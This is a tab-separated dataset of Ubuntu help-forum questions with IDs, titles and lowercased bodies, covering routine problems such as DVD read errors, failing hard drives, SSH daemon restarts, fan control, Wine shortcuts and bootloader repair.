21689	can you tell whether i have a hardware or software problem with a dvd-rom drive ?	trying to copy the content of a dvd on a asrock ion 330 running maverick , i.e . with : dd if=/dev/sr0 of=dvdcopy ... i get errors in /var/log/messages : jan 15 17:18:15 asrock kernel : [ 2616.445966 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code jan 15 17:18:15 asrock kernel : [ 2616.445975 ] sr 1:0:0:0 : [ sr0 ] result : hostbyte=did_ok driverbyte=driver_sense jan 15 17:18:15 asrock kernel : [ 2616.445984 ] sr 1:0:0:0 : [ sr0 ] sense key : medium error [ current ] jan 15 17:18:15 asrock kernel : [ 2616.445994 ] sr 1:0:0:0 : [ sr0 ] add . sense : id crc or ecc error jan 15 17:18:15 asrock kernel : [ 2616.446004 ] sr 1:0:0:0 : [ sr0 ] cdb : read ( 10 ) : 28 00 00 00 00 02 00 00 02 00 i 'd tell it is a hardware problem , but it happens with various dvds and on a second pc , also running maverick ... both the pcs previously ran lucid , same problems . edit : the dvd-roms are proven working on my brother 's pc . edit # 2 : i 'd like also hints about what to look for on google.. thanks !
21690	no option to shutdown when running from live cd	after installation it asks me to restart or continue using live system and im going to use live system but afer wards i ca n't shut down my computer there is only restart or hibernate available . i think it is a designing fault .
21692	what package is responsible for the functionality of the keyboard	i 'm attempting to forward this bug report in launchpad to the appropriate project , but i 'm not sure which one that is . the issue is with the user 's keyboard , and the issue is that some multi-key keyboard shortcuts are not being recognised if the user presses them in a certain order .
21695	how can i set up evolution to access a local mail box ?	often , when i start up a new terminal , i get the message : no mail for pwnguin , or you have 5 unread messages . i 'm not terribly great with mail , but i do have a running instance of evolution connecting to a zimbra account . how can i set up evolution to also monitor this local inbox ?
21697	why was qt chosen for unity-2d and nux for 3d ?	i would just like to know the reason ( s ) behind this decision ( pros./cons . of using qt and nux ) . thank you very much and keep on the awesome work ! ubuntu rocks ! : d
21700	how can i share my desktop using skype ?	i 'm running ubuntu lucid netbook remix on my laptop and i need to be able to share my desktop for a skype call . does anyone know how to get this done ?
21701	disk failure is imminent ( laptop hard drive , ~5 months old )	there 's another post about this , but i do n't have enough 'points ' to say anything on that thread . so i 'll start my own ... with more details ! my computer still boots , but gnome domain reports problems with hdd smart . this has been confirmed in the bios as it makes me press f1 to boot up now . i tried running hdd disk check in the bios , but it fails running the tests . as in , running the tests failed not that the tests themselves indicated a failed drive . here is what disk utility is reporting as failing : reallocated sector count failing normalized : 132 worst : 132 threshold : 140 value : 544 current pending sector count warning normalized : 200 worst : 1 threshold : 0 value : 2 is this related to the insane number of drdy errors on the drive ? kernel : [ 51345.233069 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 kernel : [ 51345.233076 ] ata1.00 : bmdma stat 0x4 kernel : [ 51345.233081 ] ata1.00 : failed command : read dma kernel : [ 51345.233090 ] ata1.00 : cmd c8/00:00:00:8b:4a/00:00:00:00:00/e0 tag 0 dma 131072 in kernel : [ 51345.233092 ] res 51/40:00 : a8:8b:4a/10:04:00:00:00/e0 emask 0x9 ( media error ) kernel : [ 51345.233097 ] ata1.00 : status : { drdy err } kernel : [ 51345.233103 ] ata1.00 : error : { unc } kernel : [ 51345.291929 ] ata1.00 : configured for udma/100 kernel : [ 51345.291944 ] ata1 : eh complete kernel : [ 51347.682748 ] ata1.00 : exception emask 0x0 sact 0x0 serr 0x0 action 0x0 kernel : [ 51347.682754 ] ata1.00 : bmdma stat 0x4 kernel : [ 51347.682759 ] ata1.00 : failed command : read dma kernel : [ 51347.682768 ] ata1.00 : cmd c8/00:00:00:8b:4a/00:00:00:00:00/e0 tag 0 dma 131072 in kernel : [ 51347.682770 ] res 51/40:00 : a8:8b:4a/10:04:00:00:00/e0 emask 0x9 ( media error ) kernel : [ 51347.682774 ] ata1.00 : status : { drdy err } kernel : [ 51347.682777 ] ata1.00 : error : { unc } did ubuntu 10.10 and/or ext4 eat my work laptop ? what steps can i take to backup my important information , which is probably the home folder . please include steps to recover my data on the new hard drive as well . it does me little good to have backups i ca n't use .
21707	what are the accessibility problems of qt ?	jonathan ridell said in a blog post that there were accessibility problems with qt . i would just like to know what those problems are . thank you very much and keep up the excelent work . ubuntu rocks !
21708	`` folder sharing '' says `` share name is too long '' ... for what ?	most of the time when i share a folder from ubuntu , the name field is made yellow and it says `` share name too long '' . but even if i keep this name , it works fine . so what is it too long for ? what is the limit ?
21711	multiple monitors , multiple workspaces ?	i connected my laptop to my lcd . using the laptop display hotkey i can switch between different modes - only laptop monitor on , only lcd monitor on , both on and display the same view , both on and the desktop is stretched ( divided ) . but , i 'm looking for something else - i would like to have two workspaces , one visible on the laptop monitor and the other on the lcd . is that possible ?
21714	unreadable characters in programs ( graphic glitch )	a picture is worth a thousand words ... screenshot ( gvim ) - screenshot ( libreoffice ) - the appearance preferences dialog - anyone know what causes it and how it can be fixed ? if it 's relevant - the system runs on an amd turion and a geforce go 6100 . i have a feeling it 's got something to do with video memory . although i could be wrong .
21717	why ca n't i purge apache2.2-bin and apache2.2-common ?	i have tried to completely remove apache2.2 from my system . but the only thing that happens is that apt-get will remove `` apache2-mpm-prefork '' and install `` apache2-mpm-worker '' . i have killed all apache processes and tried in both synaptic . and apt-get from terminal . why wo n't my system delete apache , and why will it install `` apache2-mpm-worker '' ?
21718	problem deleting broken files on external drive	i have a 500gb external drive ( maxtor one touch ) some days ago i moved some files from the destkop to it . the operation failed ( on the disk there are only 4 or 5 incomplete files ) and i ca n't remove those files . i tried through nautilus and from the command line but nothing.. any idea ? thanks
21719	how large should i make root , home , and swap partitions ?	i have a laptop with win7 installed . i have now made a 60gb partition which i want to install ubuntu into . the question i have , before i do the installation , is how large each of the root , swap , and home partition should be ? i have read some place that root could be as small as 8gb , but is n't that too small ? since i guess beside ubuntu all the softwares installed will reside there as well ? and i think i 'm going to set my swap to be 2gb large . my main concern is how large should the root partition should be . i 'm mainly going to use ubuntu for programming and browse the web .
21721	how do i set ctrl+alt+something for audacious global hokeys ?	i want to set up global hotkeys in audacious as follows . when i try and set these up it does n't allow two mask keys . ctrl+alt+insert for play . ctrl+alt+home for pause . ctrl+alt+end for stop . ctrl+alt+page up for previous track . ctrl+alt+page down for next track . ctrl+alt+up arrow for volume up . ctrl+alt+down for volume down . ctrl+alt+left for skip back . ctrl+alt+right for skip forward .
21724	how do i make 33 % `` list view '' in nautilus be the default view for the system ?	how do i make 33 % `` list view '' in nautilus be the default view for the system ? if there is n't a way , another thought i am questioning : is there a way to set a view to go recursive into all child folders ? what if i want my music folder to have a certain style of view permanently ?
21730	how does ubuntu make money ?	we get various distros like kubuntu/ubuntu/lubuntu/edu/etc ... for free . we get critical updates constantly . we can download any programs we want from ubuntu repos . gee , i ca n't even imagine what kind of a cdn network you got ta have to support all this . also , ubuntu has a lot of people working for them : ubuntu jobs can someone explain how this is possible financially ?
21733	ca n't set permissions for usb drives ?	i 'm trying to set permissions for folders on usb drives that i 've mounted with nautilus , but when i change the permission , it just changes right back again . no error message or any other explanation . i 've tried `` open as administrator '' and it still does n't work . how do i set the permissions so that they can be accessed as shared folders on the network ?
21741	performance cost of running ubuntu from external hard drive	a friend just complained to me about ubuntu being slow . although i 've noticed a certain lack of snappiness with linux vs windows in the past , i really ca n't say i 've had much to grumble about with the recent distributions of ubuntu . that said , his objections seem much worse than the ones i used to have and i know that his current setup is significantly more powerful than my laptop . and then it turned out he is running ubuntu off an external hdd hooked up via usb2.0 . the hd enclosure is usb3.0 but apparently he ca n't manage to get it to boot on usb3.0 so he switched to one of the usb2.0 ports or whatever and that works , albeit not very well . now i would expect usb to add some overhead to communication between the computer and the hdd ; sata is after all designed to get the maximum out of a hard drive , whereas usb is , well , universal . what are your expreriences with booting off external hdds ? edit : does anybody know just how much of a slowdown can be expected ?
21742	how to troubleshoot system freezing ?	i have a problem with my ubuntu 10.10 system which regularly freezes and can then only be switched off via the mains switch . when i try to re-start the system i need to try repeatedly before it will log in . how can i trace the reason for this and correct it ?
21747	gnome-panel white vertical lines between minimized apps	when i minimize programs to gnome-panel , i now have white vertical lines separating them , this never used to happen . i have tried deleting my .gconf , .metacity , .gnome2 folders , re-installing light themes , nothing seems to work . any ideas ?
21749	msi u130 freezes on shutdown	the computer freezes when i shutdown . i have tried the acpi options acpi=off and acpi=force but they do n't work . the computer is a msi u130 . the only way to shutdown is by long pressing the power button . it is running ubuntu netbook edition 10.10 . wifi : rt3090 wireless 802.11n 1t/1r pcie
21751	how to turn off power management for external hard drive ( seagate goflex ) ?	i bought this 2tb segate goflex this last black friday and since then every 15 minutes or so the drive spins down , and then a little while later completely dismounts . very annoying . from what i understand you could turn this off using the including windows and mac only software . this function and what controls it is n't proprietary , right ? there has to be something that 'll let me set it in ubuntu ... anyone have any suggestions ? also , i formatted it to ext4 . hope i did n't screw myself up . : /
21755	how to add multiple workspaces in unity 2d ?	in unity 2d there is n't any multiple workspaces . how can add more than that 1 ?
21756	internal microphone does not work	i have an acer aspire one d250 with ubuntu netbook edition 10.10 . the internal microphone is not working . what can i do to fix this ? audio device : n10/ich 7 family high definition audio controller
21759	what are the legal consequences of customizing the livecd ?	the organization i work at wants to create a custom ubuntu livecd , the customizations are : pre-installed programs , plugins , some device drivers , and aesthetics such as icons and backgrounds , as well as changing firefox 's homepage and removing unneeded packages . not big changes , obviously , and we wish to distribute this custom image for clients to use as a bootable cd or usb stick in order to have a quick environment where all our tools are available instantly . what are the licensing and legal consequences of this ? what if some of the programs or plugins that are to be pre-packaged are not gpl 'd ? i should finally note that we are not changing any code in the kernel or any other distro component . thank you for your time !
21766	how can you get google sketchup running ?	how can you get google sketchup to work on ubuntu ?
21768	software to create a video slideshow ?	i have a bunch of pictures i 'd like to make into a basic slideshow , as a video ( e.g . mpeg/avi ) . what software is available to do this ? i started using pitivi based on recommendation in another question , which seemed nice at first . however , it 's very unstable - just crashed my whole system ! regardless , it wo n't let me do anything over 10 seconds because the timeline keeps jumping back to the start any time i try and move/resize a clip . all i need is to fade between some images . anything out there ?
21776	cvs vs svn vs git vs anyother	cvs is being used in my workplace and i 've no much knowledge of cvs other than installing and creating cvs users and i heard developers share their project with eclipse or something like that . i 'm asked to check for best repositories which offers advanced features giving the hints svn and git . if any one using these repositories please short list their features and if possible with links of good installation guides and a bit information of what the eclipse to do with these repositories . thank you !
21780	`` unable to install initrd-tools '' error during installation	i was trying to install ubuntu from a cd on a machine which already has windows on it , choose the option of `` resize ide1 master ( hda ) and use freed space '' during the `` install the base system '' step . after that i got the error : unable to install initrd-tools . an error was returned while trying to install the initrd-tools package into the target system . check /target/var/log/bootstrap.log for details . the problem is on one hand i can not proceed with the complete installation and on other hand if i remove the cd , am not able to boot windows as it says `` no bootable device '' . would highly appreciate for any recommendations .
21781	how do you change window control position in the unity panel ?	currently , my window decorations are in the top left as per the default ubuntu , but i have reordered them to `` minimize , maximize , close '' however on unity desktop , when i maximize my window , and the unity panel takes over window decorations , it switches back to the default `` close , minimize , maximize '' i tried poking around gconf and could n't find anything , anybody have a tweak ?
21784	how do i change the background of the side pane ?	how do i go about changing the white background on nautilus-elementary 's side pane ? i want to change it specifically to match the color of the toolbar and status-bar .
21787	how to get desktop background picture changed periodically ?	can i set up desktop background picture to be set a random file from a given directory every given period of time ?
21788	ubuntu one sync certain filetype/prefix	i want to only sync files with a certain prefix in a folder . is there some way i can get ubuntu one to only sync these files or ignore other files ?
21790	keep up to date with rhythmbox ?	since banshee is going to be replacing rhythmbox in 11.04 , is there a ppa for rhythmbox so i can still keep up to date with the newest stable builds ?
21800	gnome session not starting after filesystem corruption	i 'm running ubuntu 9.10 desktop edition . suddenly today /home became corrupted and i was prompted to run fsck manually . i ran fsck -y /home and rebooted the system . the system booted but i got no gui interface ( gnome session ) but a black screen with a user prompt instead . any tricks here to start my system normally ? any help is greatly appreciated . edit:1 the error were similar to the the following ( may be with some mistakes as i had to type it manually ) : machine1 login : root password : at login sun jan 16 15:30:46 ist 2011 on tty1 ext3-fs error ( devie sda1 ) : ext3_lookup : deleted inode referenced aborting journal on device sda1 remounting filesystem read-only root @ machine1 : ~ # startx ktemp : failed to create file via template `/tmp/serverauth.xxxxxxxxxxx : read-only file /usr/bin/startx : line 157 : can not create temp file for here-document : read-only file xauth : error in locking authority file /root/.xauthority /usr/bin/startx : line 173 : cannnot create temp file for here-document : read-only file xauth : error in locking authority file /root/.xauthority /usr/bin/startx : line 173 : cannnot create temp file for here-document : read-only file x : can not stat /tmp/.x11-unix ( no such file or directory ) , aborting giving up . xinit : no such file or directory ( errno 2 ) : unable to connect to xserver xinit : no such process ( errno 3 ) : server error xauth : error in locking authority file /root/.xauthority
21801	ssh server not working ( respawns until stopped )	i have a running ubuntu server 10.04.1 . when i tried to login to the server via ssh , i could not . instead , i got connection refused error . i tried to ping the machine and i got reply ! so , the clear reason is that ssh daemon is stopped . after reboot , i was able to login to my server via ssh . after some time , i looked at my logs /var/log/syslog and found the following records : jan 16 10:57:09 myserver init : ssh main process ended , respawning jan 16 10:57:09 myserver init : ssh main process ( 2465 ) terminated with status 255 jan 16 10:57:09 myserver init : ssh main process ended , respawning jan 16 10:57:09 myserver init : ssh main process ( 2469 ) terminated with status 255 jan 16 10:57:09 myserver init : ssh main process ended , respawning jan 16 10:57:09 myserver init : ssh main process ( 2473 ) terminated with status 255 jan 16 10:57:09 myserver init : ssh main process ended , respawning jan 16 10:57:09 myserver init : ssh main process ( 2477 ) terminated with status 255 jan 16 10:57:09 myserver init : ssh main process ended , respawning jan 16 10:57:09 myserver init : ssh main process ( 2481 ) terminated with status 255 jan 16 10:57:09 myserver init : ssh main process ended , respawning jan 16 10:57:09 myserver init : ssh main process ( 2485 ) terminated with status 255 jan 16 10:57:09 myserver init : ssh main process ended , respawning jan 16 10:57:09 myserver init : ssh main process ( 2489 ) terminated with status 255 jan 16 10:57:09 myserver init : ssh main process ended , respawning jan 16 10:57:09 myserver init : ssh main process ( 2493 ) terminated with status 255 jan 16 10:57:09 myserver init : ssh main process ended , respawning jan 16 10:57:09 myserver init : ssh main process ( 2497 ) terminated with status 255 jan 16 10:57:09 myserver init : ssh main process ended , respawning jan 16 10:57:09 myserver init : ssh main process ( 2501 ) terminated with status 255 jan 16 10:57:09 myserver init : ssh respawning too fast , stopped i searched for a similar problem/solution . some people said that this is caused by the ssh daemon trying to start before networking and they suggest to change listenaddress in /etc/ssh/sshd_config to be 0.0.0.0 . i think this is not the cause in my case , because my problem occurs after system is up and running . any idea what is causing this ? this is ubuntu server and it should be running and accessed remotely using ssh . update : here is the log snippet i found in /var/log/auth.log . jan 16 10:56:38 myserver sudo : user : tty=pts/0 ; pwd=/home/user ; user=root ; command=/usr/bin/vim /etc/ssh/sshd_config jan 16 10:57:09 myserver sudo : user : tty=pts/0 ; pwd=/home/user ; user=root ; command=/etc/init.d/ssh reload jan 16 10:57:09 myserver sshd [ 1465 ] : received sighup ; restarting . jan 16 10:57:09 myserver sshd [ 2461 ] : server listening on 0.0.0.0 port 22 . jan 16 10:57:09 myserver sshd [ 2465 ] : error : bind to port 22 on 0.0.0.0 failed : address already in use . jan 16 10:57:09 myserver sshd [ 2465 ] : fatal : can not bind any address . jan 16 10:57:09 myserver sshd [ 2469 ] : error : bind to port 22 on 0.0.0.0 failed : address already in use . jan 16 10:57:09 myserver sshd [ 2469 ] : fatal : can not bind any address . jan 16 10:57:09 myserver sshd [ 2473 ] : error : bind to port 22 on 0.0.0.0 failed : address already in use . jan 16 10:57:09 myserver sshd [ 2473 ] : fatal : can not bind any address . jan 16 10:57:09 myserver sshd [ 2477 ] : error : bind to port 22 on 0.0.0.0 failed : address already in use . jan 16 10:57:09 myserver sshd [ 2477 ] : fatal : can not bind any address . jan 16 10:57:09 myserver sshd [ 2481 ] : error : bind to port 22 on 0.0.0.0 failed : address already in use . jan 16 10:57:09 myserver sshd [ 2481 ] : fatal : can not bind any address . jan 16 10:57:09 myserver sshd [ 2485 ] : error : bind to port 22 on 0.0.0.0 failed : address already in use . jan 16 10:57:09 myserver sshd [ 2485 ] : fatal : can not bind any address . jan 16 10:57:09 myserver sshd [ 2489 ] : error : bind to port 22 on 0.0.0.0 failed : address already in use . jan 16 10:57:09 myserver sshd [ 2489 ] : fatal : can not bind any address . jan 16 10:57:09 myserver sshd [ 2493 ] : error : bind to port 22 on 0.0.0.0 failed : address already in use . jan 16 10:57:09 myserver sshd [ 2493 ] : fatal : can not bind any address . jan 16 10:57:09 myserver sshd [ 2497 ] : error : bind to port 22 on 0.0.0.0 failed : address already in use . jan 16 10:57:09 myserver sshd [ 2497 ] : fatal : can not bind any address . jan 16 10:57:09 myserver sshd [ 2501 ] : error : bind to port 22 on 0.0.0.0 failed : address already in use . jan 16 10:57:09 myserver sshd [ 2501 ] : fatal : can not bind any address . it seems that this error started to appear after i reloaded the ssh daemon . should i avoid using ssh reload and use ssh restart instead ?
21805	how to control fan speed and temperatures on asus a8js laptop ?	i have tried installing asusfan and lm-sensors but i 'm unable to control my fans to cool my laptop down sufficiently . currently it overheats at about 100 degrees celsius and my sensors output somehow does not have any fan information on it : jackson @ olympia : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +69.0°c ( crit = +110.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +66.0°c ( high = +100.0°c , crit = +100.0°c ) coretemp-isa-0001 adapter : isa adapter core 1 : +66.0°c ( high = +100.0°c , crit = +100.0°c ) i have checked my bios and there is n't any fan settings there . i can consistently overheat just by converting a video via handbrake . i have ubuntu-desktop installed for a gui . is there a way for me to control my fans to start spinning before it reaches a critical temperature and kills itself ?
21811	how can i install and use text-to-speech software ?	i want to convert text to an audio file containing synthesised speech that reads out that text . what free ( libre+gratis ) software is available for this and how do i install and use it ? i do n't need to use it as an accessibility tool - i just want to be able to listen back to my revision notes while doing other things , like playing games .
21814	how secure is keepassx ?	i have hundreds of passwords , since i use a different random one for each website/service . they are all generated & stored with keepassx , which can be synced to different computers and my android phone via dropbox ( or ubuntuone ) . i know the database of keepassx is secure ( at least with a good passphrase ) . but what about when i am copying the password into the clipboard ( where it is stored for 5 seconds ) ? can any program running in user-space access the clipboard and store the password ? if so , how big of a security risk is this ?
21819	where is the start up file located ?	i want to add some lines which should execute every time ubuntu boots up , so i do n't have to change them manually everytime . i 've read in some place that you should edit this file /etc/rc.local . however when i add the lines i want to execute at start up it does n't run those lines . so i wonder where the start up file is located in ubuntu ? those lines i want to add is to change the sensitivity for the trackpoint one of the lines i want to add : echo -n 250 > /sys/devices/platform/i8042/serio1/serio2/sensitivity
21823	how to create a shortcut to start a windows application with wine ?	how do i create a shortcut to start a windows application with wine ? for example i have notepad++ /media/data/progs/notepad++/notepad++.exe and i would like to have a shortcut to it on the desktop .
21824	i deleted my launcher panel when i just wanted to delete a launcher . how do i start making a new panel ?	i just want to copy and paste the bit of text that describes the panel in my other user account . which textfile can i paste that into ?
21833	`` disable touchpad button '' : touchpad wo n't re-enable	my acer timeline has a `` disable touchpad button '' which works too well . that is , once i 've pressed it , pressing it again wo n't re-enable the touchpad . i 've tried a couple of things like : gconftool-2 -- set -- type boolean /desktop/gnome/peripherals/touchpad/touchpad_enabled true which worked once , but now when i do it again , it does n't work again ... in fact , i 'd like to know how to work out what the `` disable touchpad '' button is actually doing , and why doing it again is n't fixing the issue .
21836	upgraded to maverick ; ca n't change theme	i just upgraded to maverick , and now i ca n't change my theme except for the cursor and window border/decoration . i 've just reinstalled the themes i want to use ( dust + dust extra ) successfully , and while the window border/decorations change properly when i select them , nothing else changes . the icon set does n't change ; gnome-panel does n't change . i 'm stuck on the fugly fallback theme - the one you see when you do gksudo gedit or something .
21840	are there still plans for a new sound theme ?	let me quote from mark 's blog almost one year ago : march 5th , 2010 at 7:19 pm mark , will there be an update to the sound theme to match the updated visual brand ? mark shuttleworth : gack , i completely forgot about that . a very good point . would you see if you can rally a round of community submissions for a sound theme inspired by light ? let 's keep it short and sweet : what are the current considerations for the ubuntu default sound theme ? update , october 5 2011 this question was `` answered '' before the release of natty . however , it proved to be wrong in the mean time . so the legacy continues , and i am reopening this one . update , february 15 , 2012 something is rolling ! looks like there will be a new sound for 12.04 . only a start-up sound however , no complete theme . http : //design.canonical.com/2012/02/sound-theme-update/ update , april 30 , 2012 it seemed to look good , but for some reason the sound did not make it into 12.04 . there have been no announcements as to why , however . the sound theme remains a mistery ... update , may 2 , 2012 mark shuttleworth made a statement on irc recently saying that it simply `` was not perfect yet . '' it will maybe be in 12.10 then . update , december 6 , 2012 not in 12.10 , either . but - there 's still hope for 13.04 ! as of the last update , the bug report for getting a new sound theme has been marked as confirmed ( but not in progress ) with the last comment posted october 31 , 2011 . update , september 11 , 2013 wo n't be in 13.04 , and neither in 13.10 . however , an interesting proposal has popped up . the composer of the `` mass effect '' soundtrack offered to make a startup sound for ubuntu on this mailing list . http : //www.omgubuntu.co.uk/2013/09/mass-effect-composer-ubuntu-14-04-start-up-sounds discussion on reddit here .
21841	how to open a file with special character in their path ?	i tried to run it from total commander , i tried to make a link to it /media/data/ # to_backup/_music/music2/black eyed peas - the time ( dirty bit ) .avi but it says failed to execute child process `` /media/data/ '' ( permission denied ) opening the full location from mediaplayer does not work ( open location ) location not found i can open it slowly by navigating in the slow file open dialog , but i would like to open it from totalcmd or by created link or by passing full location . p.s . before that i have opened the data partition .
21842	why is there a 4-layouts limit for keyboards ?	i just discovered that i could n't add more than 4 layouts for my keyboard . googling revealed that it was a universal limit ( at least for gnu/linux ) and the only way ( s ) to get around it was to use some hackish way with scripts . is there really a technical reason behind this ? if yes , what is it ?
21851	how can i customize my bootloader to make it prettier ?	i hate how when i turn on the computer it just ( after the hp logo , which i hate having also ) , shows white text on a black background . i 'm wondering if there 's easy ways to customize this ( i 'm choosing between windows 7 and two separate ubuntu 10.10 installs ) . i 've read a little about some complicated ways to do this , but is there not some simpler ways by installing a package on ubuntu or something ? i do n't want to hack a bunch of code together to get a simple effect . i 'm hoping for actual images and having like the windows 7 logo and ubuntu logo to choose from . ideas ?
21855	managing arbitrary user permissions under pureftpd	i need to provide an ftp service that needs to be web-managed in the simplest way possible . my customer wants to create folders and users , and give them read only or read/write access arbitrarily . for example : the folder 'documents ' should be read only for several users , writable for internal users , and invisible for the rest . the folder 'pictures ' should be read only for journalists , writable for associates , and invisible for the rest . the folder 'media ' should be read only , writable or invisible for arbitrary users specified on the admin . there could be a large number of users and folders . i ca n't find a good way to accomplish that . i thought that i could give each user a home folder and put symlinks for the folders he has read access to , and make the user part of the folder 's group when he has write access too , but now i think that this would n't work , because with pureftpd ( or proftpd ) i can only specify the virtual user 's mapping to a system user , and only one guid for each virtual user . my approach requires that i could specify several guids for each user ( one by each folder he has write access to ) . i need to start programming this admin and i still do n't know wich approach would work , if any . the question is : how to give arbitrary permissions to 20 folders or so , to a large number of ftp users ?
21856	web-link-package does not work with google chrome !	i try the ubuntu software center url-request for install a package/program via a browser `` http : //apt.ubuntu.com/p/package-name '' . but with google chrome 8.0.552.224 it just sad 'you do n't seem to be running ubuntu ' in firefox it works . is there any workaround solution to this ? ( see this : https : //wiki.ubuntu.com/softwarecenter # web-link-package ) i added it as a bug on launchpad .
21857	giving wine applications more privileges ( like listening on ports below 1024 )	i 've had a problem with making quickvpn work with ubuntu . i 've got a feeling that it 's because the windows only application needs to listen on port 500 , which it can not without privileges . as you should never run wine as root , how do you at least give it some privileges ? all i 've found is that you should use `` posix capabilities '' , but i have n't been able to figure out how exactly i can do this .
21859	can not update natty running from a usb stick	in a blogpost jono explained a nice way to test the latest version of natty . under point four he proposes : step 4 : update although you installed the latest daily you should ensure it is up to date , and you can do this with : sudo apt-get update sudo apt-get upgrade now , i followed all the steps and am actually writing this question from a session running on a 4gb usb stick . when trying to update the installation though ( i just tried to do that using the update manager ) , it always fails because i do not have enough disc space remaining . how can i get ubuntu to update properly on my usb stick ?
21860	simple multi-seat	i 've asked about multiseat before . the answer ( for 10.04 ) involved doing it the proper way ( eg through gdm , multiple server layouts ) . the problem was that gdm needs to be patched or reverted to 2.20 for multiseat . it 's an ugly hack that , worse than anything , will hold up future updates . as a result , i did n't do anything . i still have a spare video card . i still have the monitor , keyboard and mouse all sitting waiting to jump into action . and i still want to be able to turn that into a simple desktop . my needs do n't seem complicated . i have a second video card , a usb hub and anything connected to that usb hub that i want to be dedicated to another x server . i do n't need a login screen ( i 'm happy hard-coding in a auto-login and i 'd be happy with the user starting the x server if that 's possible ) . this is so simple in my head that i only need two questions : how can i explicitly start an x server from the command line on an unused video adapter ( by passing it whatever configuration i need to ) ? can i have this new x session load a desktop environment on load ? this seems like something you should be able to write in a little upstart script within 10 minutes . that would be perfect for me as then i 'd have a nice start/stop control over the secondary desktop from the main desktop ( that i want to leave unscathed ! ) i 'm thinking something as simple as this for the payload : su -u other_user -c `` startx -- localhost hardware-information '' and use .xinitrc to load openbox or something ...
21862	script to connect to hidden wireless network with static ip ?	would like a script , when run , it should connect to a hidden wireless network with these details : ssid is `` wireless '' network is not broadcasting its ssid above ( is hidden ) wpa2-psk , aes , password is `` password '' static ip : 192.168.1.1 def . gateway : 192.168.1.254 dns : 192.168.1.254 no idea how to do this . but i do know the wireless interface is called wlan0 and i 'm on ubuntu 10.10 . i do n't want to use the built in network manager as it never auto-connects on startup . wicd does n't work either . any ideas most welcome .
21863	excessive fan speed when ac is plugged	for some reason when i plug in the ac the laptop fun will always run , and it is quite noticable also . is it supposed to be like that , is it some fix for it ? my laptop is a thinkpad t400
21864	how to associate a file type within wine with a native application ?	for example , i want all avi files to be associated with mplayer in wine mplayer /home/user/myvideo.avi edit from oli : i believe this this actually the inverse of what most people would assume from the original title . unless i 'm mistaken the user is using total commander in wine and would like to launch a linux-native player on the path . if i 'm wrong , just rollback this edit .
21868	what is kernel configuration ?	running powertop on an ubuntu 10.10 system , one of the suggestions are enable the config_pm_advanced_debug kernel configuration option . this option will allow powertop to collect runtime power management statistics . what is a kernel configuration option and how do i enable it ? can i put it as a startup parameter somewhere , or would i have to compile a new kernel ?
21871	how to fix the boot loader with an installation disk at hand	i recently messed up my master boot record and my system is not booting . i was dual booting windows and ubuntu . both of them are not loading now . i do n't care if i lose my windows , but i want my ubuntu back ! ! how to get it ( i have a fresh ubuntu 10.10 lts disk with me ) . i went through the install wizard but feared that i may loose my existing installation/setup . thats why i came here to check what is the ideal procedure to only update the boot record instead of a full installation .
21877	why do n't those winepath commands work ?	i tried code from this question and for some reason they do not work , why and how to fix them ? a @ ubuntu : ~ $ echo `` # ! /bin/sh '' > ~/bin/run_linx_program bash : ! /bin/sh '' : event not found a @ ubuntu : ~ $ echo `` $ 1 `` \`wine winepath -u \ '' $ 2\ '' \`\ '' '' > > ~/bin/run_linx_program > ? > ^c a @ ubuntu : ~ $
21879	no plymouth splash on startup ?	i recently bought a new laptop with an ati mobility radeon 5470hd graphics card in it and installed ubuntu . everything works just fine , but at the startup , no plymouth splash screen comes up , just a black screen with a white dash . the splash screen on shutdown works fine though . does anybody know how to fix this so i can get some eyecandy ? thanks in advance !
21880	skype does not save user configuration	on ubuntu 10.10 , i have recently started to experience this problem : for some reason skype wo n't save any settings except `` sign in on startup '' . when skype starts and tries to sign in it is unsuccessful ( it shows incorrect password , in red ) every time ( i have provided the correct password ) . i always have to click to show contacts in groups , it does not remember it . every time i have to go to options and update some notification settings . i know all these things should be `` remembered '' by skype - this problem started only recently . i do n't recall fiddling with any permissions that could have likely caused that . do you know what the problem might be ? i uninstalled ( marking for complete configuration removal ) and re-installed skype , but it still remembers my username ( why ? ? ) . can i find skype configuration files on the filesystem somewhere and change permissions for them - or even better - edit the files to set what i want ?
21886	how can i get a java apps to use the gtk+ theme ?	is there a way to get java apps to use my gtk theme ?
21891	grub/burg listing a lot of os 's	i guess i 've got more than one ubuntu installation ( either two or three ) along with a windows 7 installation . each of the ubuntu installations also list something extra ( maybe like a safe mode ? ) within grub . firstly , how do i remove the ubuntu installations i do n't use ? ( how do i first identify the one i do use ? i log into it after booting it , but how do i delete the others ) also , how do i leave just a windows 7 option and an ubuntu option ?
21892	`` waiting for sound system to respond . '' error dialog	i 'm having a nasty problem with the sound menu on my ubuntu 10.10 installation . what happens is that the sound control icon is blocked , and i ca n't control the master volume . if i try to get to the sound preferences i get a little pop-up window saying : waiting for sound system to respond ... do n't know what to do ... apart of that , sound works great .
21895	how to start ubuntu with no working video card ?	i have a laptop with broken video card . it has two operating systems installed - windows 7 and ubuntu 10.10 desktop edition . it has grub to manage which operating system to boot up . windows is default os . and windows fails to boot up without video card . i 'm checking with ping to the ports which are shown as used by dhcp in my router . normal boot of ubuntu also fails and it restarts after a while . but when i choose ( blindly , but checking hdd indicator and by counting button presses when grub menu appears ) to boot second option of ubuntu ( rescue mode ) it starts and i can ping it . but when i try to connect to it through ssh , i 'm getting `` connection refused '' error from putty . i 've took out hdd from my laptop already and inserted it to wd passport case so now i can connect it to other computer to edit configuration files . how can i check if ssh server is working ? how to enable it in rescue mode ? or better , how to disable video card to be required while booting ubuntu in normal mode ?
